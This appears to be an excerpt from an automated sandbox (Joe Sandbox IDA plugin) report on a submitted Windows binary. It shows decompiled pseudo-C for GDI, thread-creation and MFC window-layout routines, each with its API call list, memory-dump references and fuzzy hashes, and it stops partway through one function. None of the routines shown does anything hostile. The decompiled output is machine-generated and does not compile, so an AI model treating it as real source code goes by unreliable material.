                  C-Code - Quality: 84%
                  			E0042CD27(void* __ecx) {
                  				int _v8;
                  
                  				_push(__ecx);
                  				_v8 = SaveDC( *(__ecx + 8));
                  				if( *(__ecx + 4) == 0) {
                  					 *((intOrPtr*)(__ecx + 0x1c)) = 0x7fff;
                  				} else {
                  					SelectObject( *(__ecx + 4), GetStockObject(0xd));
                  					 *((intOrPtr*)(__ecx + 0x1c)) = SaveDC( *(__ecx + 4)) - _v8;
                  					SelectObject( *(__ecx + 4),  *(__ecx + 0x28));
                  				}
                  				return _v8;
                  			}





                  APIs
                  • SaveDC.GDI32(?), ref: 0042CD3A
                  • GetStockObject.GDI32(0000000D), ref: 0042CD48
                  • SelectObject.GDI32(00000000,00000000), ref: 0042CD58
                  • SaveDC.GDI32(00000000), ref: 0042CD5D
                  • SelectObject.GDI32(00000000,?), ref: 0042CD6B
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Object$SaveSelect$Stock
                  • String ID:
                  • API String ID: 2785865535-0
                  • Opcode ID: 82face962706b280c00cf35c0872dcee93cbb3a9cb6f5d9acb2b93f4f3afb489
                  • Instruction ID: d072d42024ffe69d130f0e67522b41d9a784e59db6b74b44c5ac60acea8468f4
                  • Opcode Fuzzy Hash: 82face962706b280c00cf35c0872dcee93cbb3a9cb6f5d9acb2b93f4f3afb489
                  • Instruction Fuzzy Hash: BCF06D35500A14EFC7219FA6DD48D1BBBF5FB85710B104839E14652520C771FD05DF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 65%
                  			E00433D96(intOrPtr __edx, void* __edi, long _a4, char _a8, intOrPtr _a12, long _a16, DWORD* _a20) {
                  				struct _SECURITY_ATTRIBUTES* _v0;
                  				char _v4;
                  				DWORD* _v12;
                  				void* _v24;
                  				intOrPtr _v28;
                  				void* __ebx;
                  				void* __esi;
                  				void* _t30;
                  				void* _t36;
                  				DWORD* _t41;
                  				intOrPtr* _t43;
                  				void* _t45;
                  				void* _t51;
                  				long _t54;
                  				void* _t64;
                  				intOrPtr _t65;
                  				intOrPtr* _t67;
                  				void* _t68;
                  				intOrPtr _t71;
                  				void* _t74;
                  
                  				_t64 = __edi;
                  				_t61 = __edx;
                  				_t74 = _v24;
                  				E00433BE5(_v28);
                  				asm("int3");
                  				_t71 = _t74;
                  				_push(_t67);
                  				E00435F8A();
                  				_t30 = E00435F6A(E00435F84());
                  				if(_t30 != 0) {
                  					_t54 = _a4;
                  					 *((intOrPtr*)(_t30 + 0x54)) =  *((intOrPtr*)(_t54 + 0x54));
                  					 *((intOrPtr*)(_t30 + 0x58)) =  *((intOrPtr*)(_t54 + 0x58));
                  					_t61 =  *((intOrPtr*)(_t54 + 4));
                  					_push(_t54);
                  					 *((intOrPtr*)(_t30 + 4)) =  *((intOrPtr*)(_t54 + 4));
                  					E00436192(_t51, __edi, _t67, __eflags);
                  				} else {
                  					_t67 = _a4;
                  					if(E00435FBE(E00435F84(), _t67) == 0) {
                  						ExitThread(GetLastError());
                  					}
                  					 *_t67 = GetCurrentThreadId();
                  				}
                  				_t79 =  *0x455824;
                  				if( *0x455824 != 0) {
                  					_t45 = E0043BEC0(_t79, 0x455824);
                  					_pop(_t54);
                  					_t80 = _t45;
                  					if(_t45 != 0) {
                  						 *0x455824();
                  					}
                  				}
                  				E00433D61(_t61, _t64, _t67, _t80);
                  				asm("int3");
                  				_push(_t71);
                  				_push(_t54);
                  				_push(_t51);
                  				_push(_t64);
                  				_t11 =  &_v4; // 0x416327
                  				_t65 =  *_t11;
                  				_v24 = 0;
                  				_t81 = _t65;
                  				if(_t65 != 0) {
                  					_push(_t67);
                  					E00435F8A();
                  					_t68 = E004381D6(1, 0x214);
                  					__eflags = _t68;
                  					if(__eflags == 0) {
                  						L17:
                  						_push(_t68);
                  						E004316F6(0, _t65, _t68, __eflags);
                  						__eflags = _v12;
                  						if(_v12 != 0) {
                  							E00431D64(_v12);
                  						}
                  						_t36 = 0;
                  						__eflags = 0;
                  					} else {
                  						_push( *((intOrPtr*)(E00436178(0, _t61, _t65, __eflags) + 0x6c)));
                  						_push(_t68);
                  						E00436018(0, _t65, _t68, __eflags);
                  						 *(_t68 + 4) =  *(_t68 + 4) | 0xffffffff;
                  						 *((intOrPtr*)(_t68 + 0x58)) = _a12;
                  						_t41 = _a20;
                  						 *((intOrPtr*)(_t68 + 0x54)) = _t65;
                  						__eflags = _t41;
                  						if(_t41 == 0) {
                  							_t20 =  &_a8; // 0x416327
                  							_t41 = _t20;
                  						}
                  						_t36 = CreateThread(_v0, _a4, E00433DA2, _t68, _a16, _t41);
                  						__eflags = _t36;
                  						if(__eflags == 0) {
                  							_v12 = GetLastError();
                  							goto L17;
                  						}
                  					}
                  				} else {
                  					_t43 = E00431D3E(_t81);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					 *_t43 = 0x16;
                  					E004367E9(_t61, _t65, _t67);
                  					_t36 = 0;
                  				}
                  				return _t36;
                  			}

                  APIs
                    • Part of subcall function 00433BE5: _doexit.LIBCMT ref: 00433BF1
                  • ___set_flsgetvalue.LIBCMT ref: 00433DA8
                    • Part of subcall function 00435F8A: TlsGetValue.KERNEL32(?,00436116,?,?,38A11573), ref: 00435F93
                    • Part of subcall function 00435F8A: __decode_pointer.LIBCMT ref: 00435FA5
                    • Part of subcall function 00435F8A: TlsSetValue.KERNEL32(00000000,?,38A11573), ref: 00435FB4
                  • ___fls_getvalue@4.LIBCMT ref: 00433DB3
                    • Part of subcall function 00435F6A: TlsGetValue.KERNEL32(?,?,00433DB8,00000000), ref: 00435F78
                  • ___fls_setvalue@8.LIBCMT ref: 00433DC6
                    • Part of subcall function 00435FBE: __decode_pointer.LIBCMT ref: 00435FCF
                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 00433DCF
                  • ExitThread.KERNEL32 ref: 00433DD6
                  • GetCurrentThreadId.KERNEL32 ref: 00433DDC
                  • __freefls@4.LIBCMT ref: 00433DFC
                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00433E0F
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                  • String ID:
                  • API String ID: 132634196-0
                  • Opcode ID: 2baf63a47d12a521ad33af26bfa013fcd8fc2ae0017a12262648b249769f5a7d
                  • Instruction ID: dcb9523bf8c3645b39c34fdd3cea048087dd38b06366127bac375a71ae9a6c53
                  • Opcode Fuzzy Hash: 2baf63a47d12a521ad33af26bfa013fcd8fc2ae0017a12262648b249769f5a7d
                  • Instruction Fuzzy Hash: D1E08635904A057F8F003FF38C0E88F7A2CAD0D34DF002056FD0097102EA2DD90186AD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 69%
                  			E00407A37(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12) {
                  				signed int _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				intOrPtr* _v20;
                  				signed int _v24;
                  				intOrPtr* _v28;
                  				signed int _v32;
                  				struct tagRECT _v48;
                  				struct tagRECT _v64;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr _t181;
                  				intOrPtr _t182;
                  				intOrPtr _t185;
                  				signed char _t187;
                  				intOrPtr* _t189;
                  				signed char _t193;
                  				signed int _t196;
                  				intOrPtr* _t210;
                  				intOrPtr _t213;
                  				intOrPtr* _t214;
                  				signed int _t224;
                  				signed int _t231;
                  				intOrPtr* _t233;
                  				void* _t244;
                  				signed int _t258;
                  				signed int _t264;
                  				signed int _t273;
                  				signed int _t276;
                  				signed int _t278;
                  				intOrPtr* _t281;
                  				intOrPtr _t282;
                  				intOrPtr* _t286;
                  				void* _t290;
                  				signed int _t291;
                  				intOrPtr* _t293;
                  
                  				_t281 = _a4;
                  				_push(0);
                  				_t233 = __ecx;
                  				_push(0);
                  				_push(0x418);
                  				_v8 = 0;
                  				 *_t281 = 0;
                  				 *((intOrPtr*)(_t281 + 4)) = 0;
                  				 *((intOrPtr*)( *__ecx + 0x118))();
                  				_v16 = 0;
                  				if(0 != 0) {
                  					_t276 = 0x14;
                  					_t277 = 0 * _t276 >> 0x20;
                  					_t185 = E00404461(0,  ~0x00BADBAD | 0 * _t276);
                  					_t290 = 0;
                  					_v8 = _t185;
                  					if(_v16 > 0) {
                  						_t282 = _t185;
                  						do {
                  							E004067B4(_t233, _t290, _t282);
                  							_t290 = _t290 + 1;
                  							_t282 = _t282 + 0x14;
                  						} while (_t290 < _v16);
                  						_t291 = _v16;
                  						_t281 = _a4;
                  						_t244 = 0;
                  						if(_t291 > 0) {
                  							_t187 =  *(_t233 + 0x84);
                  							if((_t187 & 0x00000002) == 0) {
                  								_t277 = _t187 & 0x00000004;
                  								if((_t187 & 0x00000004) == 0) {
                  									L20:
                  									asm("sbb eax, eax");
                  									_push(_t244);
                  									_t224 =  ~(_a8 & 2) & 0x00007fff;
                  									__eflags = _t224;
                  									_push(_t224);
                  								} else {
                  									if((_a8 & 0x00000004) == 0) {
                  										__eflags = _a8 & 0x00000008;
                  										if((_a8 & 0x00000008) == 0) {
                  											__eflags = _a8 & 0x00000010;
                  											if((_a8 & 0x00000010) == 0) {
                  												__eflags = _a12 - 0xffffffff;
                  												if(_a12 == 0xffffffff) {
                  													__eflags = _t187 & 0x00000001;
                  													if((_t187 & 0x00000001) != 0) {
                  														goto L8;
                  													} else {
                  														goto L20;
                  													}
                  												} else {
                  													SetRectEmpty( &_v48);
                  													 *((intOrPtr*)( *_t233 + 0x148))( &_v48, _a8 & 0x00000002);
                  													_t231 = _a8 & 0x00000020;
                  													__eflags = _t231;
                  													if(_t231 == 0) {
                  														_t273 = _v48.right - _v48.left;
                  														__eflags = _t273;
                  													} else {
                  														_t273 = _v48.bottom - _v48.top;
                  													}
                  													_push(_t231);
                  													_t244 = _t273 + _a12;
                  													goto L13;
                  												}
                  											} else {
                  												_push(0);
                  												L13:
                  												_push(_t244);
                  											}
                  										} else {
                  											_push(0);
                  											_push(0x7fff);
                  										}
                  									} else {
                  										L8:
                  										_push(_t244);
                  										_push( *((intOrPtr*)(_t233 + 0x70)));
                  									}
                  								}
                  								_push(_t291);
                  								_push(_v8);
                  								E004071F4(_t233, _t277);
                  							}
                  							_t189 = E004070C2(_t233,  &(_v48.right), _v8, _t291);
                  							 *_t281 =  *_t189;
                  							 *((intOrPtr*)(_t281 + 4)) =  *((intOrPtr*)(_t189 + 4));
                  							if((_a8 & 0x00000040) != 0) {
                  								_v24 = 0;
                  								_a12 = 0;
                  								_v48.bottom =  *((intOrPtr*)(_t233 + 0xa4));
                  								 *((intOrPtr*)(_t233 + 0xa4)) = 0;
                  								if(_t291 > 0) {
                  									_t210 = _v8 + 4;
                  									_v28 = _t210;
                  									_t258 = _t291;
                  									do {
                  										if(( *(_t210 + 5) & 0x00000001) != 0 &&  *_t210 != 0) {
                  											_a12 = _a12 + 1;
                  										}
                  										_t210 = _t210 + 0x14;
                  										_t258 = _t258 - 1;
                  									} while (_t258 != 0);
                  									_t314 = _a12 - _t258;
                  									if(_a12 > _t258) {
                  										_t278 = 0x18;
                  										_t213 = E00404461(_t314,  ~(_t258 & 0xffffff00 | _t314 > 0x00000000) | _a12 * _t278);
                  										_t73 = _t213 + 8; // 0x8
                  										_t286 = _t73;
                  										_v24 = _t213;
                  										_t214 = _v28;
                  										_v32 = _a12;
                  										_t264 = 0;
                  										_a12 = 0;
                  										_v12 = 0;
                  										_v20 = _t286;
                  										_v28 = _t214;
                  										while(1) {
                  											_t277 = _v32;
                  											if(_a12 >= _v32) {
                  												break;
                  											}
                  											if(( *(_t214 + 5) & 0x00000001) != 0 &&  *_t214 != 0) {
                  												 *((intOrPtr*)(_t286 - 8)) = _t264;
                  												_t277 =  &_v64;
                  												 *((intOrPtr*)(_t286 - 4)) =  *_t214;
                  												 *((intOrPtr*)( *_t233 + 0x184))(_t264,  &_v64);
                  												E00422C3C(_t233,  &_v64);
                  												_a12 = _a12 + 1;
                  												_v20 = _v20 + 0x18;
                  												_t264 = _v12;
                  												_t214 = _v28;
                  												asm("movsd");
                  												asm("movsd");
                  												asm("movsd");
                  												asm("movsd");
                  												_t286 = _v20;
                  											}
                  											_t264 = _t264 + 1;
                  											_t214 = _t214 + 0x14;
                  											_v12 = _t264;
                  											_v28 = _t214;
                  											if(_t264 < _v16) {
                  												continue;
                  											}
                  											break;
                  										}
                  										_t291 = _v16;
                  										_t281 = _a4;
                  									}
                  								}
                  								_t193 =  *(_t233 + 0x84);
                  								if((_t193 & 0x00000001) != 0 && (_t193 & 0x00000004) != 0) {
                  									 *((intOrPtr*)(_t233 + 0x70)) =  *_t281;
                  								}
                  								_v12 = _v12 & 0x00000000;
                  								_t323 = _t291;
                  								if(_t291 > 0) {
                  									_v20 = _v8;
                  									do {
                  										E00406EBD(_t233, _t277, _t323, _v12, _v20);
                  										_v12 = _v12 + 1;
                  										_v20 = _v20 + 0x14;
                  									} while (_v12 < _t291);
                  								}
                  								if(_a12 > 0) {
                  									_t293 = _v24 + 8;
                  									_v20 = _t293;
                  									do {
                  										_t196 = E00412A84(_t233,  *((intOrPtr*)(_t293 - 4)));
                  										_v32 = _t196;
                  										if(_t196 != 0) {
                  											GetWindowRect( *(_t196 + 0x20),  &_v64);
                  											 *((intOrPtr*)( *_t233 + 0x184))( *((intOrPtr*)(_v20 - 8)),  &_v64);
                  											E00412D05(_v32, 0, _v64.left -  *_t293 + _v64.left, _v64.top -  *((intOrPtr*)(_t293 + 4)) + _v64.top, 0, 0, 0x15);
                  											_t293 = _v20;
                  											_t281 = _a4;
                  										}
                  										_t293 = _t293 + 0x18;
                  										_t142 =  &_a12;
                  										 *_t142 = _a12 - 1;
                  										_t329 =  *_t142;
                  										_v20 = _t293;
                  									} while ( *_t142 != 0);
                  									E00404490(_t233, _t281, _t293, _t329, _v24);
                  								}
                  								 *((intOrPtr*)(_t233 + 0xa4)) = _v48.bottom;
                  							}
                  							E00404490(_t233, _t281, _t291, _t329, _v8);
                  						}
                  					}
                  				}
                  				SetRectEmpty( &_v64);
                  				 *((intOrPtr*)( *_t233 + 0x148))( &_v64, _a8 & 0x00000002);
                  				 *((intOrPtr*)(_t281 + 4)) =  *((intOrPtr*)(_t281 + 4)) + _v64.top - _v64.bottom;
                  				 *_t281 =  *_t281 + _v64.left - _v64.right;
                  				E00421213( &(_v48.right), _a8 & 0x00000001, _a8 & 0x00000002);
                  				_t181 =  *_t281;
                  				if(_t181 <= _v48.right) {
                  					_t181 = _v48.right;
                  				}
                  				 *_t281 = _t181;
                  				_t182 =  *((intOrPtr*)(_t281 + 4));
                  				if(_t182 <= _v48.bottom) {
                  					_t182 = _v48.bottom;
                  				}
                  				 *((intOrPtr*)(_t281 + 4)) = _t182;
                  				return _t281;
                  			}

                  APIs
                  • SetRectEmpty.USER32(?), ref: 00407D2F
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                  • GetWindowRect.USER32 ref: 00407CBB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$EmptyWindow_malloc
                  • String ID: @
                  • API String ID: 299164714-2766056989
                  • Opcode ID: be64618f2995d1ac5620793d283faa2dacdca16006dd552ff218ca8fd73bee1b
                  • Instruction ID: a71238d07f4ff9f52c397f01adc39de216819e658bc352016629bc36c2669070
                  • Opcode Fuzzy Hash: be64618f2995d1ac5620793d283faa2dacdca16006dd552ff218ca8fd73bee1b
                  • Instruction Fuzzy Hash: CDC15B71E04209AFCF14CFA8C884AEEB7B5FF48304F14816AE915BB291DB38A941CB55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 98%
                  			E0041C322(void* __ebx, int __ecx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t91;
                  				intOrPtr _t95;
                  				signed short _t97;
                  				signed short _t98;
                  				signed short _t101;
                  				signed short _t103;
                  				signed short _t108;
                  				signed short _t114;
                  				signed int* _t118;
                  				signed short _t132;
                  				signed short _t135;
                  				signed short _t139;
                  				signed short _t140;
                  				signed short _t162;
                  				intOrPtr* _t167;
                  				signed short _t178;
                  				signed short _t192;
                  				intOrPtr* _t196;
                  				int _t198;
                  				intOrPtr* _t199;
                  				void* _t200;
                  
                  				_push(0x3c);
                  				E00431A9B(E0044B99F, __ebx, __edi, __esi);
                  				_t198 = __ecx;
                  				 *(_t200 - 0x10) = __ecx;
                  				_t196 = E0040F898(__ecx);
                  				_t91 = E0041E9BB(0x44ff98, _t196);
                  				_t202 = _t91;
                  				if(_t91 == 0) {
                  					_t196 = E00403AA0();
                  				}
                  				E00404A80(_t200 - 0x48);
                  				 *((intOrPtr*)(_t200 - 0x38)) = _t196;
                  				 *((intOrPtr*)(_t200 - 0x44)) =  *((intOrPtr*)(_t198 + 0x54));
                  				 *((intOrPtr*)(_t200 - 0x3c)) = _t198;
                  				_t199 = E0041E928( *(_t200 + 0x10), _t202);
                  				if(_t199 != 0) {
                  					_t95 =  *((intOrPtr*)(_t200 + 0x14));
                  					 *((intOrPtr*)(_t199 + 0xa8)) = _t95;
                  					 *((intOrPtr*)( *_t196 + 0x168))(1, _t95);
                  					_t97 = E00404461(__eflags, 0xa8);
                  					 *(_t200 + 0x10) = _t97;
                  					 *(_t200 - 4) = 0;
                  					__eflags = _t97;
                  					if(__eflags == 0) {
                  						_t98 = 0;
                  						__eflags = 0;
                  					} else {
                  						_t98 = E0042DDDF(_t97, __eflags);
                  					}
                  					 *(_t200 - 4) =  *(_t200 - 4) | 0xffffffff;
                  					 *(_t199 + 0xac) = _t98;
                  					_t101 = E0041E9BB("�IE",  *((intOrPtr*)( *_t196 + 0x148))());
                  					 *(_t200 + 0x10) = _t101;
                  					__eflags = _t101;
                  					if(_t101 == 0) {
                  						_t191 =  *(_t200 + 8) & 0x0000ffff;
                  						_t103 =  *((intOrPtr*)( *( *(_t199 + 0xac)) + 0x180))(_t196,  *(_t200 + 8) & 0x0000ffff, 0x2800, 0xe802);
                  						__eflags = _t103;
                  						if(_t103 == 0) {
                  							goto L9;
                  						}
                  						 *( *(_t199 + 0xac) + 0x58) = 1;
                  						goto L25;
                  					} else {
                  						_t132 = E0041E9BB(0x4549cc,  *((intOrPtr*)( *(_t200 - 0x10) + 0x54)));
                  						 *(_t200 - 0x14) = _t132;
                  						__eflags = _t132;
                  						if(_t132 != 0) {
                  							_t178 =  *(_t200 + 0x10);
                  							_t192 =  *(_t178 + 0x10c);
                  							 *(_t200 - 0x10) = _t192;
                  							__eflags = _t192;
                  							if(_t192 == 0) {
                  								 *(_t200 - 0x10) =  *(_t178 + 0x108);
                  							}
                  							 *((intOrPtr*)( *_t132 + 0x110))(0);
                  							__eflags =  *(_t200 - 0x10);
                  							if( *(_t200 - 0x10) == 0) {
                  								goto L9;
                  							} else {
                  								_t191 =  *(_t200 + 8) & 0x0000ffff;
                  								_t135 =  *((intOrPtr*)( *( *(_t199 + 0xac)) + 0x180))( *(_t200 - 0x10),  *(_t200 + 8) & 0x0000ffff, 0x2800, 0xe802);
                  								__eflags = _t135;
                  								if(_t135 == 0) {
                  									goto L9;
                  								}
                  								 *( *(_t199 + 0xac) + 0x58) = 1;
                  								E00420CB9( *(_t199 + 0xac),  *(_t200 + 0x10));
                  								 *(_t200 - 0x10) = 0;
                  								 *(_t200 + 8) = 0;
                  								 *(_t200 - 4) = 1;
                  								_t139 = E0041B4D2( *(_t200 + 0x10), _t200 + 8);
                  								__eflags = _t139;
                  								if(_t139 < 0) {
                  									E0041B4A1( *(_t200 + 0x10), _t200 + 8);
                  									 *(_t200 - 0x10) = 1;
                  								}
                  								_t140 =  *(_t200 + 8);
                  								__eflags = _t140;
                  								if(_t140 != 0) {
                  									 *((intOrPtr*)( *_t140 + 0x14))(_t140, _t200 - 0x34);
                  									_t191 = _t200 - 0x34;
                  									 *((intOrPtr*)( *( *(_t200 - 0x14)) + 0x12c))(_t200 - 0x34,  *(_t200 + 8),  *(_t200 - 0x10));
                  									_t140 =  *(_t200 + 8);
                  								}
                  								 *(_t200 - 4) =  *(_t200 - 4) | 0xffffffff;
                  								 *( *(_t200 + 0x10) + 0x154) = 1;
                  								__eflags = _t140;
                  								if(_t140 != 0) {
                  									 *((intOrPtr*)( *_t140 + 8))(_t140);
                  								}
                  								L25:
                  								 *((intOrPtr*)(_t200 - 0x24)) = 0;
                  								 *((intOrPtr*)(_t200 - 0x20)) = 0;
                  								 *((intOrPtr*)(_t200 - 0x1c)) = 0;
                  								 *((intOrPtr*)(_t200 - 0x18)) = 0;
                  								_t114 =  *((intOrPtr*)( *_t199 + 0x54))(0, 0, 0x50800000, _t200 - 0x24, _t196, 0xe900, _t200 - 0x48);
                  								_t167 = _t196;
                  								__eflags = _t114;
                  								if(_t114 != 0) {
                  									 *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x14)) + 0xc)) = E0040835B(_t167);
                  									_t118 = E0040835B( *((intOrPtr*)( *_t196 + 0x148))());
                  									__eflags = _t118;
                  									if(__eflags != 0) {
                  										_t191 =  *_t118;
                  										 *((intOrPtr*)( *_t118 + 0x168))(0, _t118, _t118);
                  									}
                  									__eflags = E0041BD1E(0, _t199, _t191, _t196, _t199, __eflags,  *((intOrPtr*)(_t200 + 0xc)));
                  									if(__eflags != 0) {
                  										E00408362(_t196, _t199, 1);
                  										SendMessageA( *( *(_t199 + 0xac) + 0x20), 0x363, 1, 0);
                  										 *((intOrPtr*)( *_t196 + 0x150))(1);
                  										UpdateWindow( *(_t196 + 0x20));
                  									} else {
                  										E0041B668(_t199, __eflags);
                  									}
                  									_t108 = 1;
                  									__eflags = 1;
                  									goto L33;
                  								}
                  								 *((intOrPtr*)( *_t196 + 0x168))(0,  *((intOrPtr*)(_t200 + 0x14)));
                  								L12:
                  								 *((intOrPtr*)(_t199 + 0xa8)) = 0;
                  								 *((intOrPtr*)( *_t199 + 4))(1);
                  								goto L3;
                  							}
                  						}
                  						L9:
                  						 *((intOrPtr*)( *_t196 + 0x168))(0,  *((intOrPtr*)(_t200 + 0x14)));
                  						_t162 =  *(_t199 + 0xac);
                  						__eflags = _t162;
                  						if(_t162 != 0) {
                  							 *((intOrPtr*)( *_t162 + 4))(1);
                  						}
                  						 *(_t199 + 0xac) = 0;
                  						goto L12;
                  					}
                  				} else {
                  					L3:
                  					_t108 = 0;
                  					L33:
                  					return E00431B73(_t108);
                  				}
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041C329
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                  • SendMessageA.USER32(?,00000363,00000001,00000000), ref: 0041C5E4
                  • UpdateWindow.USER32(?), ref: 0041C5F9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3MessageSendUpdateWindow_malloc
                  • String ID: IE
                  • API String ID: 291802051-3275544015
                  • Opcode ID: 2e68bd0ae61063ed93b13c8ce44b8d9f28524add92b49c011ad9828dbfab3aff
                  • Instruction ID: d0b6d8a432cfeddc55617652b4a4c4f0c68d15cc15fa885d4595bbb90d12322d
                  • Opcode Fuzzy Hash: 2e68bd0ae61063ed93b13c8ce44b8d9f28524add92b49c011ad9828dbfab3aff
                  • Instruction Fuzzy Hash: 7A917C70600215EFCB04DFA5C888AEEB7B5FF48304F20852EF8569B391DB79A981CB55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 92%
                  			E0040BF7C(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t77;
                  				signed int* _t89;
                  				intOrPtr _t91;
                  				signed int* _t94;
                  				intOrPtr* _t95;
                  				signed int _t97;
                  				signed int _t98;
                  				signed int _t100;
                  				intOrPtr _t101;
                  				intOrPtr _t102;
                  				intOrPtr _t111;
                  				intOrPtr* _t117;
                  				void* _t119;
                  				void* _t120;
                  				intOrPtr* _t122;
                  				signed int _t125;
                  				intOrPtr* _t127;
                  				void* _t128;
                  
                  				_push(0x38);
                  				_t77 = E00431A9B(E0044AF82, __ebx, __edi, __esi);
                  				_t127 = __ecx;
                  				_t100 = 0;
                  				if( *(_t128 + 8) != 0) {
                  					GetWindowRect( *(__ecx + 0x20), _t128 - 0x30);
                  					OffsetRect(_t128 - 0x30,  ~( *(_t128 - 0x30)),  ~( *(_t128 - 0x2c)));
                  					 *((intOrPtr*)( *_t127 + 0x148))(_t128 - 0x30, 1);
                  					 *((intOrPtr*)( *_t127 + 0x118))(0x407, 0, _t128 - 0x20);
                  					_t89 =  *(_t127 + 0x74);
                  					_t125 =  *((intOrPtr*)(_t128 - 0x28)) -  *(_t128 - 0x30) +  *((intOrPtr*)(_t128 - 0x18));
                  					_t111 =  *((intOrPtr*)(_t127 + 0x78));
                  					 *(_t128 + 8) = 0;
                  					if(_t89 > 0) {
                  						_t117 = _t111 + 4;
                  						 *(_t128 - 0x14) = _t89;
                  						do {
                  							if(( *(_t117 + 4) & 0x08000000) != 0) {
                  								 *(_t128 + 8) =  *(_t128 + 8) + 1;
                  							}
                  							_t119 = 0xfffffffa;
                  							_t120 = _t119 -  *_t117;
                  							_t117 = _t117 + 0x14;
                  							_t118 = _t120 -  *((intOrPtr*)(_t128 - 0x18));
                  							_t125 = _t125 + _t120 -  *((intOrPtr*)(_t128 - 0x18));
                  							_t24 = _t128 - 0x14;
                  							 *_t24 =  *(_t128 - 0x14) - 1;
                  						} while ( *_t24 != 0);
                  					}
                  					 *((intOrPtr*)(_t128 - 0x44)) = 0x450958;
                  					 *(_t128 - 0x40) = _t100;
                  					 *(_t128 - 0x34) = _t100;
                  					 *(_t128 - 0x38) = _t100;
                  					 *(_t128 - 0x3c) = _t100;
                  					_t31 = _t128 - 0x44; // 0x450958
                  					 *(_t128 - 4) = _t100;
                  					E0040BB4C(_t31, _t125, _t89, 0xffffffff);
                  					 *(_t128 - 0x10) =  *(_t128 - 0x10) & 0x00000000;
                  					_t101 =  *((intOrPtr*)(_t128 - 0x20));
                  					_t91 =  *((intOrPtr*)(_t127 + 0x78));
                  					if( *(_t127 + 0x74) > 0) {
                  						_t94 = _t91 + 8;
                  						 *(_t128 - 0x14) = _t94;
                  						while(1) {
                  							_t102 = _t101 +  *((intOrPtr*)(_t94 - 4)) + 6;
                  							if(( *_t94 & 0x08000000) != 0 && _t125 > 0) {
                  								_t97 = _t125;
                  								asm("cdq");
                  								_t98 = _t97 /  *(_t128 + 8);
                  								_t118 = _t97 %  *(_t128 + 8);
                  								_t102 = _t102 + _t98;
                  								 *(_t128 + 8) =  *(_t128 + 8) - 1;
                  								_t125 = _t125 - _t98;
                  							}
                  							_t54 = _t128 - 0x44; // 0x450958
                  							_t95 = E0040B917(_t54,  *(_t128 - 0x10));
                  							 *(_t128 - 0x14) =  &(( *(_t128 - 0x14))[5]);
                  							 *_t95 = _t102;
                  							_t101 = _t102 +  *((intOrPtr*)(_t128 - 0x18));
                  							 *(_t128 - 0x10) =  *(_t128 - 0x10) + 1;
                  							if( *(_t128 - 0x10) >=  *(_t127 + 0x74)) {
                  								goto L13;
                  							}
                  							_t94 =  *(_t128 - 0x14);
                  						}
                  					}
                  					L13:
                  					 *((intOrPtr*)( *_t127 + 0x118))(0x404,  *(_t127 + 0x74),  *(_t128 - 0x40));
                  					 *(_t128 - 4) =  *(_t128 - 4) | 0xffffffff;
                  					_t67 = _t128 - 0x44; // 0x450958
                  					_t77 = E0040BC87(_t67);
                  					_t100 = 0;
                  				}
                  				if( *((intOrPtr*)(_t128 + 0xc)) != _t100) {
